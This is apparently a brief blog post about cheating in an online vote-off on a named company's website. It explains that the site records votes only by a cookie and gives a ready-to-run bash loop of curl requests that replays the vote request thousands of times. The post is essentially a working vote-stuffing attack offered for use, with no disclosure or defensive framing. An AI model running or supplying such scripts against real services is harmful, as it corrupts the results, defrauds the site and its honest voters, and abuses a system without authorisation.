A little time to get one out; 1 minute hack gets you popular

Sometimes humans compete. When we leave the scoring up to electronic systems, it gets a whole lot easier to cheat.

I don’t know how to correctly count anonymous votes but I sure can fake them!

When MeetAdvisors has a vote-off like shown here: http://www.meetadvisors.com/post/vote-off-top-10-companies-on-meetadvisors-in-2014
you can submit your vote by clicking a facebook-esque ‘like’ button and see your vote added.

As it happens, they track which items you have voted for by setting a cookie named startup_vote_<id> where id is what you voted for. The content of the cookie is not needed.

If you wanted to vote a few thousand times, you could just replicate the same AJAX post the ‘like’ button did and throw away the cookies.

for i in {1..[HOW_POPULAR_YOU_ARE]}; do
curl "http://www.meetadvisors.com/[PAGE_YOU_VOTE_ON]?id=[ID_OF_ITEM_TO_VOTE_FOR]" -H "Host: http://www.meetadvisors.com" -H "Accept: application/json, text/javascript, */*; q=0.01" --compressed -H "X-Requested-With: XMLHttpRequest" -H "Connection: keep-alive";
done

Advertisements
A little time to get one out; 1 minute hack gets you popular